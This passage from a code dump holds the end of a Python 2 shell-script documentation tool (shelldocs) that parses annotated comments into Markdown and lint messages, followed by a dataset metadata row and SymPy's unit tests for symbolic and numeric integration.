if self.stability is None:
return "None"
else:
return self.stability
def setreplace(self, text):
'''set the replacement state'''
self.replaceb = docstrip("replaceable", text)
self.replaceb = self.replaceb.capitalize()
def getreplace(self):
'''get the replacement state'''
if self.replaceb == "Yes":
return self.replaceb
else:
return "No"
def getinter(self):
'''get the function state'''
return self.getaudience(), self.getstability(), self.getreplace()
def addreturn(self, text):
'''add a return state'''
if self.returnt is None:
self.returnt = []
self.returnt.append(docstrip("return", text))
def getreturn(self):
'''get the complete return state'''
if self.returnt is None:
return "Nothing"
else:
return "\n\n".join(self.returnt)
def adddesc(self, text):
'''add to the description'''
if self.desc is None:
self.desc = []
self.desc.append(docstrip("description", text))
def getdesc(self):
'''get the description'''
if self.desc is None:
return "None"
else:
return " ".join(self.desc)
def addparam(self, text):
'''add a parameter'''
if self.params is None:
self.params = []
self.params.append(docstrip("param", text))
def getparams(self):
'''get all of the parameters'''
if self.params is None:
return ""
else:
return " ".join(self.params)
def getusage(self):
'''get the usage string'''
line = "%s %s" % (self.name, self.getparams())
return line.rstrip()
def headerbuild(self):
'''get the header for this function'''
if self.getreplace() == "Yes":
replacetext = "Replaceable"
else:
replacetext = "Not Replaceable"
line = "%s/%s/%s" % (self.getaudience(), self.getstability(),
replacetext)
return line
def getdocpage(self):
'''get the built document page for this function'''
line = "### `%s`\n\n"\
"* Synopsis\n\n"\
"```\n%s\n"\
"```\n\n" \
"* Description\n\n" \
"%s\n\n" \
"* Returns\n\n" \
"%s\n\n" \
"| Classification | Level |\n" \
"| :--- | :--- |\n" \
"| Audience | %s |\n" \
"| Stability | %s |\n" \
"| Replaceable | %s |\n\n" \
% (self.getname(),
self.getusage(),
self.getdesc(),
self.getreturn(),
self.getaudience(),
self.getstability(),
self.getreplace())
return line
def lint(self):
'''Lint this function'''
getfuncs = {
"audience": self.getaudience,
"stability": self.getstability,
"replaceable": self.getreplace,
}
validvalues = {
"audience": ("Public", "Private"),
"stability": ("Stable", "Evolving"),
"replaceable": ("Yes", "No"),
}
messages = []
for attr in ("audience", "stability", "replaceable"):
value = getfuncs[attr]()
if value == "None":
messages.append("%s:%u: ERROR: function %s has no @%s" %
(self.getfilename(), self.getlinenum(),
self.getname(), attr.lower()))
elif value not in validvalues[attr]:
validvalue = "|".join(v.lower() for v in validvalues[attr])
messages.append(
"%s:%u: ERROR: function %s has invalid value (%s) for @%s (%s)"
% (self.getfilename(), self.getlinenum(), self.getname(),
value.lower(), attr.lower(), validvalue))
return "\n".join(messages)
def __str__(self):
'''Generate a string for this function'''
line = "{%s %s %s %s}" \
% (self.getname(),
self.getaudience(),
self.getstability(),
self.getreplace())
return line
def marked_as_ignored(file_path):
"""Checks for the presence of the marker(SHELLDOC-IGNORE) to ignore the file.
Marker needs to be in a line of its own and can not
be an inline comment.
A leading '#' and white-spaces(leading or trailing)
are trimmed before checking equality.
Comparison is case sensitive and the comment must be in
UPPERCASE.
"""
with open(file_path) as input_file:
for line_num, line in enumerate(input_file, 1):
if line.startswith("#") and line[1:].strip() == "SHELLDOC-IGNORE":
print >> sys.stderr, "Yo! Got an ignore directive in",\
"file:{} on line number:{}".format(file_path, line_num)
return True
return False
def main():
'''main entry point'''
parser = OptionParser(
usage="usage: %prog [--skipprnorep] " + "[--output OUTFILE|--lint] " +
"--input INFILE " + "[--input INFILE ...]",
epilog=
"You can mark a file to be ignored by shelldocs by adding"
" 'SHELLDOC-IGNORE' as comment in its own line."
)
parser.add_option("-o",
"--output",
dest="outfile",
action="store",
type="string",
help="file to create",
metavar="OUTFILE")
parser.add_option("-i",
"--input",
dest="infile",
action="append",
type="string",
help="file to read",
metavar="INFILE")
parser.add_option("--skipprnorep",
dest="skipprnorep",
action="store_true",
help="Skip Private & Not Replaceable")
parser.add_option("--lint",
dest="lint",
action="store_true",
help="Enable lint mode")
parser.add_option(
"-V",
"--version",
dest="release_version",
action="store_true",
default=False,
help="display version information for shelldocs and exit.")
(options, dummy_args) = parser.parse_args()
if options.release_version:
with open(
os.path.join(
os.path.dirname(__file__), "../VERSION"), 'r') as ver_file:
print ver_file.read()
sys.exit(0)
if options.infile is None:
parser.error("At least one input file needs to be supplied")
elif options.outfile is None and options.lint is None:
parser.error(
"At least one of output file and lint mode needs to be specified")
allfuncs = []
try:
for filename in options.infile:
with open(filename, "r") as shellcode:
# if the file contains a comment containing
# only "SHELLDOC-IGNORE" then skip that file
if marked_as_ignored(filename):
continue
funcdef = ShellFunction(filename)
linenum = 0
for line in shellcode:
linenum = linenum + 1
if line.startswith('## @description'):
funcdef.adddesc(line)
elif line.startswith('## @audience'):
funcdef.setaudience(line)
elif line.startswith('## @stability'):
funcdef.setstability(line)
elif line.startswith('## @replaceable'):
funcdef.setreplace(line)
elif line.startswith('## @param'):
funcdef.addparam(line)
elif line.startswith('## @return'):
funcdef.addreturn(line)
elif line.startswith('function'):
funcdef.setname(line)
funcdef.setlinenum(linenum)
if options.skipprnorep and \
funcdef.getaudience() == "Private" and \
funcdef.getreplace() == "No":
pass
else:
allfuncs.append(funcdef)
funcdef = ShellFunction(filename)
except IOError, err:
print >> sys.stderr, "ERROR: Failed to read from file: %s. Aborting." % err.filename
sys.exit(1)
allfuncs = sorted(allfuncs)
if options.lint:
for funcs in allfuncs:
message = funcs.lint()
if len(message) > 0:
print message
if options.outfile is not None:
with open(options.outfile, "w") as outfile:
outfile.write(ASFLICENSE)
for line in toc(allfuncs):
outfile.write(line)
outfile.write("\n------\n\n")
header = []
for funcs in allfuncs:
if header != funcs.getinter():
header = funcs.getinter()
line = "## %s\n" % (funcs.headerbuild())
outfile.write(line)
outfile.write(funcs.getdocpage())
if __name__ == "__main__":
main()
| 33.497685 | 92 | 0.526225 |
4b5765b499fd75b5845e0cc23fc09047bbae17f4 | 37,175 | py | Python | sympy/integrals/tests/test_integrals.py | pv/sympy | ee2374aa2de2d730aafa1fdefbdffe08b94041ff | [
"BSD-3-Clause"
] | 1 | 2016-02-13T15:46:16.000Z | 2016-02-13T15:46:16.000Z | sympy/integrals/tests/test_integrals.py | ojengwa/sympy | f90e7a8e4fd8fa9e7d6c6fecb4c7efe8f987ec60 | [
"BSD-3-Clause"
] | null | null | null | sympy/integrals/tests/test_integrals.py | ojengwa/sympy | f90e7a8e4fd8fa9e7d6c6fecb4c7efe8f987ec60 | [
"BSD-3-Clause"
] | null | null | null | from sympy import (
Abs, acos, acosh, Add, adjoint, asin, asinh, atan, Ci, conjugate, cos,
Derivative, diff, DiracDelta, E, exp, erf, erfi, EulerGamma, factor, Function,
Heaviside, I, Integral, integrate, Interval, Lambda, LambertW, log,
Matrix, O, oo, pi, Piecewise, Poly, Rational, S, simplify, sin, tan, sqrt,
sstr, Sum, Symbol, symbols, sympify, terms_gcd, transpose, trigsimp,
Tuple, nan, And, Eq, Or
)
from sympy.integrals.risch import NonElementaryIntegral
from sympy.utilities.pytest import XFAIL, raises, slow
from sympy.physics import units
x, y, a, t, x_1, x_2, z = symbols('x y a t x_1 x_2 z')
n = Symbol('n', integer=True)
f = Function('f')
def diff_test(i):
"""Return the set of symbols, s, which were used in testing that
i.diff(s) agrees with i.doit().diff(s). If there is an error then
the assertion will fail, causing the test to fail."""
syms = i.free_symbols
for s in syms:
assert (i.diff(s).doit() - i.doit().diff(s)).expand() == 0
return syms
def test_improper_integral():
assert integrate(log(x), (x, 0, 1)) == -1
assert integrate(x**(-2), (x, 1, oo)) == 1
def test_constructor():
# this is shared by Sum, so testing Integral's constructor
# is equivalent to testing Sum's
s1 = Integral(n, n)
assert s1.limits == (Tuple(n),)
s2 = Integral(n, (n,))
assert s2.limits == (Tuple(n),)
s3 = Integral(Sum(x, (x, 1, y)))
assert s3.limits == (Tuple(y),)
s4 = Integral(n, Tuple(n,))
assert s4.limits == (Tuple(n),)
s5 = Integral(n, (n, Interval(1, 2)))
assert s5.limits == (Tuple(n, 1, 2),)
def test_basics():
assert Integral(0, x) != 0
assert Integral(x, (x, 1, 1)) != 0
assert Integral(oo, x) != oo
assert Integral(S.NaN, x) == S.NaN
assert diff(Integral(y, y), x) == 0
assert diff(Integral(x, (x, 0, 1)), x) == 0
assert diff(Integral(x, x), x) == x
assert diff(Integral(t, (t, 0, x)), x) == x + Integral(0, (t, 0, x))
e = (t + 1)**2
assert diff(integrate(e, (t, 0, x)), x) == \
diff(Integral(e, (t, 0, x)), x).doit().expand() == \
((1 + x)**2).expand()
assert diff(integrate(e, (t, 0, x)), t) == \
diff(Integral(e, (t, 0, x)), t) == 0
assert diff(integrate(e, (t, 0, x)), a) == \
diff(Integral(e, (t, 0, x)), a) == 0
assert diff(integrate(e, t), a) == diff(Integral(e, t), a) == 0
assert integrate(e, (t, a, x)).diff(x) == \
Integral(e, (t, a, x)).diff(x).doit().expand()
assert Integral(e, (t, a, x)).diff(x).doit() == ((1 + x)**2)
assert integrate(e, (t, x, a)).diff(x).doit() == (-(1 + x)**2).expand()
assert integrate(t**2, (t, x, 2*x)).diff(x) == 7*x**2
assert Integral(x, x).atoms() == set([x])
assert Integral(f(x), (x, 0, 1)).atoms() == set([S(0), S(1), x])
assert diff_test(Integral(x, (x, 3*y))) == set([y])
assert diff_test(Integral(x, (a, 3*y))) == set([x, y])
# sum integral of terms
assert integrate(y + x + exp(x), x) == x*y + x**2/2 + exp(x)
assert Integral(x).is_commutative
n = Symbol('n', commutative=False)
assert Integral(n + x, x).is_commutative is False
def test_basics_multiple():
assert diff_test(Integral(x, (x, 3*x, 5*y), (y, x, 2*x))) == set([x])
assert diff_test(Integral(x, (x, 5*y), (y, x, 2*x))) == set([x])
assert diff_test(Integral(x, (x, 5*y), (y, y, 2*x))) == set([x, y])
assert diff_test(Integral(y, y, x)) == set([x, y])
assert diff_test(Integral(y*x, x, y)) == set([x, y])
assert diff_test(Integral(x + y, y, (y, 1, x))) == set([x])
assert diff_test(Integral(x + y, (x, x, y), (y, y, x))) == set([x, y])
def test_conjugate_transpose():
A, B = symbols("A B", commutative=False)
x = Symbol("x", complex=True)
p = Integral(A*B, (x,))
assert p.adjoint().doit() == p.doit().adjoint()
assert p.conjugate().doit() == p.doit().conjugate()
assert p.transpose().doit() == p.doit().transpose()
x = Symbol("x", real=True)
p = Integral(A*B, (x,))
assert p.adjoint().doit() == p.doit().adjoint()
assert p.conjugate().doit() == p.doit().conjugate()
assert p.transpose().doit() == p.doit().transpose()
def test_integration():
assert integrate(0, (t, 0, x)) == 0
assert integrate(3, (t, 0, x)) == 3*x
assert integrate(t, (t, 0, x)) == x**2/2
assert integrate(3*t, (t, 0, x)) == 3*x**2/2
assert integrate(3*t**2, (t, 0, x)) == x**3
assert integrate(1/t, (t, 1, x)) == log(x)
assert integrate(-1/t**2, (t, 1, x)) == 1/x - 1
assert integrate(t**2 + 5*t - 8, (t, 0, x)) == x**3/3 + 5*x**2/2 - 8*x
assert integrate(x**2, x) == x**3/3
assert integrate((3*t*x)**5, x) == (3*t)**5 * x**6 / 6
b = Symbol("b")
c = Symbol("c")
assert integrate(a*t, (t, 0, x)) == a*x**2/2
assert integrate(a*t**4, (t, 0, x)) == a*x**5/5
assert integrate(a*t**2 + b*t + c, (t, 0, x)) == a*x**3/3 + b*x**2/2 + c*x
def test_multiple_integration():
assert integrate((x**2)*(y**2), (x, 0, 1), (y, -1, 2)) == Rational(1)
assert integrate((y**2)*(x**2), x, y) == Rational(1, 9)*(x**3)*(y**3)
assert integrate(1/(x + 3)/(1 + x)**3, x) == \
-S(1)/8*log(3 + x) + S(1)/8*log(1 + x) + x/(4 + 8*x + 4*x**2)
def test_issue_3532():
assert integrate(exp(-x), (x, 0, oo)) == 1
def test_issue_3560():
assert integrate(sqrt(x)**3, x) == 2*sqrt(x)**5/5
assert integrate(sqrt(x), x) == 2*sqrt(x)**3/3
assert integrate(1/sqrt(x)**3, x) == -2/sqrt(x)
def test_integrate_poly():
p = Poly(x + x**2*y + y**3, x, y)
qx = integrate(p, x)
qy = integrate(p, y)
assert isinstance(qx, Poly) is True
assert isinstance(qy, Poly) is True
assert qx.gens == (x, y)
assert qy.gens == (x, y)
assert qx.as_expr() == x**2/2 + x**3*y/3 + x*y**3
assert qy.as_expr() == x*y + x**2*y**2/2 + y**4/4
def test_integrate_poly_defined():
p = Poly(x + x**2*y + y**3, x, y)
Qx = integrate(p, (x, 0, 1))
Qy = integrate(p, (y, 0, pi))
assert isinstance(Qx, Poly) is True
assert isinstance(Qy, Poly) is True
assert Qx.gens == (y,)
assert Qy.gens == (x,)
assert Qx.as_expr() == Rational(1, 2) + y/3 + y**3
assert Qy.as_expr() == pi**4/4 + pi*x + pi**2*x**2/2
def test_integrate_omit_var():
y = Symbol('y')
assert integrate(x) == x**2/2
raises(ValueError, lambda: integrate(2))
raises(ValueError, lambda: integrate(x*y))
def test_integrate_poly_accurately():
y = Symbol('y')
assert integrate(x*sin(y), x) == x**2*sin(y)/2
# when passed to risch_norman, this will be a CPU hog, so this really
# checks, that integrated function is recognized as polynomial
assert integrate(x**1000*sin(y), x) == x**1001*sin(y)/1001
def test_issue_3635():
y = Symbol('y')
assert integrate(x**2, y) == x**2*y
assert integrate(x**2, (y, -1, 1)) == 2*x**2
# works in sympy and py.test but hangs in `setup.py test`
def test_integrate_linearterm_pow():
# check integrate((a*x+b)^c, x) -- issue 3499
y = Symbol('y', positive=True)
# TODO: Remove conds='none' below, let the assumption take care of it.
assert integrate(x**y, x, conds='none') == x**(y + 1)/(y + 1)
assert integrate((exp(y)*x + 1/y)**(1 + sin(y)), x, conds='none') == \
exp(-y)*(exp(y)*x + 1/y)**(2 + sin(y)) / (2 + sin(y))
def test_issue_3618():
assert integrate(pi*sqrt(x), x) == 2*pi*sqrt(x)**3/3
assert integrate(pi*sqrt(x) + E*sqrt(x)**3, x) == \
2*pi*sqrt(x)**3/3 + 2*E *sqrt(x)**5/5
def test_issue_3623():
assert integrate(cos((n + 1)*x), x) == Piecewise(
(x, Eq(n + 1, 0)), (sin((n + 1)*x)/(n + 1), True))
assert integrate(cos((n - 1)*x), x) == Piecewise(
(x, Eq(n - 1, 0)), (sin((n - 1)*x)/(n - 1), True))
assert integrate(cos((n + 1)*x) + cos((n - 1)*x), x) == \
Piecewise((x, Eq(n + 1, 0)), (sin((n + 1)*x)/(n + 1), True)) + \
Piecewise((x, Eq(n - 1, 0)), (sin((n - 1)*x)/(n - 1), True))
def test_issue_3664():
n = Symbol('n', integer=True, nonzero=True)
assert integrate(-1./2 * x * sin(n * pi * x/2), [x, -2, 0]) == \
2*cos(pi*n)/(pi*n)
assert integrate(-Rational(1)/2 * x * sin(n * pi * x/2), [x, -2, 0]) == \
2*cos(pi*n)/(pi*n)
def test_issue_3679():
# definite integration of rational functions gives wrong answers
assert NS(Integral(1/(x**2 - 8*x + 17), (x, 2, 4))) == '1.10714871779409'
def test_issue_3686(): # remove this when fresnel itegrals are implemented
from sympy import expand_func, fresnels
assert expand_func(integrate(sin(x**2), x)) == \
sqrt(2)*sqrt(pi)*fresnels(sqrt(2)*x/sqrt(pi))/2
def test_integrate_units():
m = units.m
s = units.s
assert integrate(x * m/s, (x, 1*s, 5*s)) == 12*m*s
def test_transcendental_functions():
assert integrate(LambertW(2*x), x) == \
-x + x*LambertW(2*x) + x/LambertW(2*x)
def test_issue_3740():
f = 4*log(x) - 2*log(x)**2
fid = diff(integrate(f, x), x)
assert abs(f.subs(x, 42).evalf() - fid.subs(x, 42).evalf()) < 1e-10
def test_issue_3788():
assert integrate(1/(1 + x**2), x) == atan(x)
def test_issue_3952():
f = sin(x)
assert integrate(f, x) == -cos(x)
raises(ValueError, lambda: integrate(f, 2*x))
def test_issue_4516():
assert integrate(2**x - 2*x, x) == 2**x/log(2) - x**2
def test_matrices():
M = Matrix(2, 2, lambda i, j: (i + j + 1)*sin((i + j + 1)*x))
assert integrate(M, x) == Matrix([
[-cos(x), -cos(2*x)],
[-cos(2*x), -cos(3*x)],
])
# issue1012
def test_integrate_functions():
assert integrate(f(x), x) == Integral(f(x), x)
assert integrate(f(x), (x, 0, 1)) == Integral(f(x), (x, 0, 1))
assert integrate(f(x)*diff(f(x), x), x) == f(x)**2/2
assert integrate(diff(f(x), x) / f(x), x) == log(f(x))
def test_integrate_derivatives():
assert integrate(Derivative(f(x), x), x) == f(x)
assert integrate(Derivative(f(y), y), x) == x*Derivative(f(y), y)
def test_transform():
a = Integral(x**2 + 1, (x, -1, 2))
fx = x
fy = 3*y + 1
assert a.doit() == a.transform(fx, fy).doit()
assert a.transform(fx, fy).transform(fy, fx) == a
fx = 3*x + 1
fy = y
assert a.transform(fx, fy).transform(fy, fx) == a
a = Integral(sin(1/x), (x, 0, 1))
assert a.transform(x, 1/y) == Integral(sin(y)/y**2, (y, 1, oo))
assert a.transform(x, 1/y).transform(y, 1/x) == a
a = Integral(exp(-x**2), (x, -oo, oo))
assert a.transform(x, 2*y) == Integral(2*exp(-4*y**2), (y, -oo, oo))
# < 3 arg limit handled properly
assert Integral(x, x).transform(x, a*y).doit() == \
Integral(y*a**2, y).doit()
_3 = S(3)
assert Integral(x, (x, 0, -_3)).transform(x, 1/y).doit() == \
Integral(-1/x**3, (x, -oo, -1/_3)).doit()
assert Integral(x, (x, 0, _3)).transform(x, 1/y) == \
Integral(y**(-3), (y, 1/_3, oo))
def test_issue_4052():
f = S(1)/2*asin(x) + x*sqrt(1 - x**2)/2
assert integrate(cos(asin(x)), x) == f
assert integrate(sin(acos(x)), x) == f
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_evalf_integrals():
assert NS(Integral(x, (x, 2, 5)), 15) == '10.5000000000000'
gauss = Integral(exp(-x**2), (x, -oo, oo))
assert NS(gauss, 15) == '1.77245385090552'
assert NS(gauss**2 - pi + E*Rational(
1, 10**20), 15) in ('2.71828182845904e-20', '2.71828182845905e-20')
# A monster of an integral from http://mathworld.wolfram.com/DefiniteIntegral.html
t = Symbol('t')
a = 8*sqrt(3)/(1 + 3*t**2)
b = 16*sqrt(2)*(3*t + 1)*sqrt(4*t**2 + t + 1)**3
c = (3*t**2 + 1)*(11*t**2 + 2*t + 3)**2
d = sqrt(2)*(249*t**2 + 54*t + 65)/(11*t**2 + 2*t + 3)**2
f = a - b/c - d
assert NS(Integral(f, (t, 0, 1)), 50) == \
NS((3*sqrt(2) - 49*pi + 162*atan(sqrt(2)))/12, 50)
# http://mathworld.wolfram.com/VardisIntegral.html
assert NS(Integral(log(log(1/x))/(1 + x + x**2), (x, 0, 1)), 15) == \
NS('pi/sqrt(3) * log(2*pi**(5/6) / gamma(1/6))', 15)
# http://mathworld.wolfram.com/AhmedsIntegral.html
assert NS(Integral(atan(sqrt(x**2 + 2))/(sqrt(x**2 + 2)*(x**2 + 1)), (x,
0, 1)), 15) == NS(5*pi**2/96, 15)
# http://mathworld.wolfram.com/AbelsIntegral.html
assert NS(Integral(x/((exp(pi*x) - exp(
-pi*x))*(x**2 + 1)), (x, 0, oo)), 15) == NS('log(2)/2-1/4', 15)
# Complex part trimming
# http://mathworld.wolfram.com/VardisIntegral.html
assert NS(Integral(log(log(sin(x)/cos(x))), (x, pi/4, pi/2)), 15, chop=True) == \
NS('pi/4*log(4*pi**3/gamma(1/4)**4)', 15)
#
# Endpoints causing trouble (rounding error in integration points -> complex log)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 17, chop=True) == NS(2, 17)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 20, chop=True) == NS(2, 20)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 22, chop=True) == NS(2, 22)
# Needs zero handling
assert NS(pi - 4*Integral(
'sqrt(1-x**2)', (x, 0, 1)), 15, maxn=30, chop=True) in ('0.0', '0')
# Oscillatory quadrature
a = Integral(sin(x)/x**2, (x, 1, oo)).evalf(maxn=15)
assert 0.49 < a < 0.51
assert NS(
Integral(sin(x)/x**2, (x, 1, oo)), quad='osc') == '0.504067061906928'
assert NS(Integral(
cos(pi*x + 1)/x, (x, -oo, -1)), quad='osc') == '0.276374705640365'
# indefinite integrals aren't evaluated
assert NS(Integral(x, x)) == 'Integral(x, x)'
assert NS(Integral(x, (x, y))) == 'Integral(x, (x, y))'
def test_evalf_issue_939():
# https://github.com/sympy/sympy/issues/4038
# The output form of an integral may differ by a step function between
# revisions, making this test a bit useless. This can't be said about
# other two tests. For now, all values of this evaluation are used here,
# but in future this should be reconsidered.
assert NS(integrate(1/(x**5 + 1), x).subs(x, 4), chop=True) in \
['-0.000976138910649103', '0.965906660135753', '1.93278945918216']
assert NS(Integral(1/(x**5 + 1), (x, 2, 4))) == '0.0144361088886740'
assert NS(
integrate(1/(x**5 + 1), (x, 2, 4)), chop=True) == '0.0144361088886740'
@XFAIL
def test_failing_integrals():
#---
# Double integrals not implemented
assert NS(Integral(
sqrt(x) + x*y, (x, 1, 2), (y, -1, 1)), 15) == '2.43790283299492'
# double integral + zero detection
assert NS(Integral(sin(x + x*y), (x, -1, 1), (y, -1, 1)), 15) == '0.0'
def test_integrate_DiracDelta():
# This is here to check that deltaintegrate is being called, but also
# to test definite integrals. More tests are in test_deltafunctions.py
assert integrate(DiracDelta(x) * f(x), (x, -oo, oo)) == f(0)
assert integrate(DiracDelta(x) * f(x), (x, 0, oo)) == f(0)/2
assert integrate(DiracDelta(x)**2, (x, -oo, oo)) == DiracDelta(0)
# issue 4522
assert integrate(integrate((4 - 4*x + x*y - 4*y) * \
DiracDelta(x)*DiracDelta(y - 1), (x, 0, 1)), (y, 0, 1)) == 0
# issue 5729
p = exp(-(x**2 + y**2))/pi
assert integrate(p*DiracDelta(x - 10*y), (x, -oo, oo), (y, -oo, oo)) == \
integrate(p*DiracDelta(x - 10*y), (y, -oo, oo), (x, -oo, oo)) == \
integrate(p*DiracDelta(10*x - y), (x, -oo, oo), (y, -oo, oo)) == \
integrate(p*DiracDelta(10*x - y), (y, -oo, oo), (x, -oo, oo)) == \
1/sqrt(101*pi)
@XFAIL
def test_integrate_DiracDelta_fails():
# issue 6427
assert integrate(integrate(integrate(
DiracDelta(x - y - z), (z, 0, oo)), (y, 0, 1)), (x, 0, 1)) == S(1)/2
def test_integrate_returns_piecewise():
assert integrate(x**y, x) == Piecewise(
(log(x), Eq(y, -1)), (x**(y + 1)/(y + 1), True))
assert integrate(x**y, y) == Piecewise(
(y, Eq(log(x), 0)), (x**y/log(x), True))
assert integrate(exp(n*x), x) == Piecewise(
(x, Eq(n, 0)), (exp(n*x)/n, True))
assert integrate(x*exp(n*x), x) == Piecewise(
(x**2/2, Eq(n**3, 0)), ((x*n**2 - n)*exp(n*x)/n**3, True))
assert integrate(x**(n*y), x) == Piecewise(
(log(x), Eq(n*y, -1)), (x**(n*y + 1)/(n*y + 1), True))
assert integrate(x**(n*y), y) == Piecewise(
(y, Eq(n*log(x), 0)), (x**(n*y)/(n*log(x)), True))
assert integrate(cos(n*x), x) == Piecewise(
(x, Eq(n, 0)), (sin(n*x)/n, True))
assert integrate(cos(n*x)**2, x) == Piecewise(
(x, Eq(n, 0)), ((n*x/2 + sin(n*x)*cos(n*x)/2)/n, True))
assert integrate(x*cos(n*x), x) == Piecewise(
(x**2/2, Eq(n, 0)), (x*sin(n*x)/n + cos(n*x)/n**2, True))
assert integrate(sin(n*x), x) == Piecewise(
(0, Eq(n, 0)), (-cos(n*x)/n, True))
assert integrate(sin(n*x)**2, x) == Piecewise(
(0, Eq(n, 0)), ((n*x/2 - sin(n*x)*cos(n*x)/2)/n, True))
assert integrate(x*sin(n*x), x) == Piecewise(
(0, Eq(n, 0)), (-x*cos(n*x)/n + sin(n*x)/n**2, True))
assert integrate(exp(x*y),(x,0,z)) == Piecewise( \
(z, Eq(y,0)), (exp(y*z)/y - 1/y, True))
def test_subs1():
e = Integral(exp(x - y), x)
assert e.subs(y, 3) == Integral(exp(x - 3), x)
e = Integral(exp(x - y), (x, 0, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(x - y)*f(y), (y, -oo, oo))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo))
def test_subs2():
e = Integral(exp(x - y), x, t)
assert e.subs(y, 3) == Integral(exp(x - 3), x, t)
e = Integral(exp(x - y), (x, 0, 1), (t, 0, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 1), (t, 0, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(x - y)*f(y), (y, -oo, oo), (t, 0, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs3():
e = Integral(exp(x - y), (x, 0, y), (t, y, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 3), (t, 3, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(x - y)*f(y), (y, -oo, oo), (t, x, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs4():
e = Integral(exp(x), (x, 0, y), (t, y, 1))
assert e.subs(y, 3) == Integral(exp(x), (x, 0, 3), (t, 3, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(y)*f(y), (y, -oo, oo), (t, x, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs5():
e = Integral(exp(-x**2), (x, -oo, oo))
assert e.subs(x, 5) == e
e = Integral(exp(-x**2 + y), x)
assert e.subs(y, 5) == Integral(exp(-x**2 + 5), x)
e = Integral(exp(-x**2 + y), (x, x))
assert e.subs(x, 5) == Integral(exp(y - x**2), (x, 5))
assert e.subs(y, 5) == Integral(exp(-x**2 + 5), x)
e = Integral(exp(-x**2 + y), (y, -oo, oo), (x, -oo, oo))
assert e.subs(x, 5) == e
assert e.subs(y, 5) == e
# Test evaluation of antiderivatives
e = Integral(exp(-x**2), (x, x))
assert e.subs(x, 5) == Integral(exp(-x**2), (x, 5))
e = Integral(exp(x), x)
assert (e.subs(x,1)-e.subs(x,0) - Integral(exp(x),(x,0,1))).doit().is_zero
def test_subs6():
a, b = symbols('a b')
e = Integral(x*y, (x, f(x), f(y)))
assert e.subs(x, 1) == Integral(x*y, (x, f(1), f(y)))
assert e.subs(y, 1) == Integral(x, (x, f(x), f(1)))
e = Integral(x*y, (x, f(x), f(y)), (y, f(x), f(y)))
assert e.subs(x, 1) == Integral(x*y, (x, f(1), f(y)), (y, f(1), f(y)))
assert e.subs(y, 1) == Integral(x*y, (x, f(x), f(y)), (y, f(x), f(1)))
e = Integral(x*y, (x, f(x), f(a)), (y, f(x), f(a)))
assert e.subs(a, 1) == Integral(x*y, (x, f(x), f(1)), (y, f(x), f(1)))
def test_subs7():
e = Integral(x, (x, 1, y), (y, 1, 2))
assert e.subs({x: 1, y: 2}) == e
e = Integral(sin(x) + sin(y), (x, sin(x), sin(y)),
(y, 1, 2))
assert e.subs(sin(y), 1) == e
assert e.subs(sin(x), 1) == Integral(sin(x) + sin(y), (x, 1, sin(y)),
(y, 1, 2))
def test_expand():
e = Integral(f(x)+f(x**2), (x, 1, y))
assert e.expand() == Integral(f(x), (x, 1, y)) + Integral(f(x**2), (x, 1, y))
def test_integration_variable():
raises(ValueError, lambda: Integral(exp(-x**2), 3))
raises(ValueError, lambda: Integral(exp(-x**2), (3, -oo, oo)))
def test_expand_integral():
assert Integral(cos(x**2)*(sin(x**2) + 1), (x, 0, 1)).expand() == \
Integral(cos(x**2)*sin(x**2), (x, 0, 1)) + \
Integral(cos(x**2), (x, 0, 1))
assert Integral(cos(x**2)*(sin(x**2) + 1), x).expand() == \
Integral(cos(x**2)*sin(x**2), x) + \
Integral(cos(x**2), x)
def test_as_sum_midpoint1():
e = Integral(sqrt(x**3 + 1), (x, 2, 10))
assert e.as_sum(1, method="midpoint") == 8*sqrt(217)
assert e.as_sum(2, method="midpoint") == 4*sqrt(65) + 12*sqrt(57)
assert e.as_sum(3, method="midpoint") == 8*sqrt(217)/3 + \
8*sqrt(3081)/27 + 8*sqrt(52809)/27
assert e.as_sum(4, method="midpoint") == 2*sqrt(730) + \
4*sqrt(7) + 4*sqrt(86) + 6*sqrt(14)
assert abs(e.as_sum(4, method="midpoint").n() - e.n()) < 0.5
e = Integral(sqrt(x**3 + y**3), (x, 2, 10), (y, 0, 10))
raises(NotImplementedError, lambda: e.as_sum(4))
def test_as_sum_midpoint2():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="midpoint").expand() == S(1)/4 + y + y**2
assert e.as_sum(2, method="midpoint").expand() == S(5)/16 + y + y**2
assert e.as_sum(3, method="midpoint").expand() == S(35)/108 + y + y**2
assert e.as_sum(4, method="midpoint").expand() == S(21)/64 + y + y**2
def test_as_sum_left():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="left").expand() == y**2
assert e.as_sum(2, method="left").expand() == S(1)/8 + y/2 + y**2
assert e.as_sum(3, method="left").expand() == S(5)/27 + 2*y/3 + y**2
assert e.as_sum(4, method="left").expand() == S(7)/32 + 3*y/4 + y**2
def test_as_sum_right():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="right").expand() == 1 + 2*y + y**2
assert e.as_sum(2, method="right").expand() == S(5)/8 + 3*y/2 + y**2
assert e.as_sum(3, method="right").expand() == S(14)/27 + 4*y/3 + y**2
assert e.as_sum(4, method="right").expand() == S(15)/32 + 5*y/4 + y**2
def test_as_sum_raises():
e = Integral((x + y)**2, (x, 0, 1))
raises(ValueError, lambda: e.as_sum(-1))
raises(ValueError, lambda: e.as_sum(0))
raises(ValueError, lambda: Integral(x).as_sum(3))
raises(NotImplementedError, lambda: e.as_sum(oo))
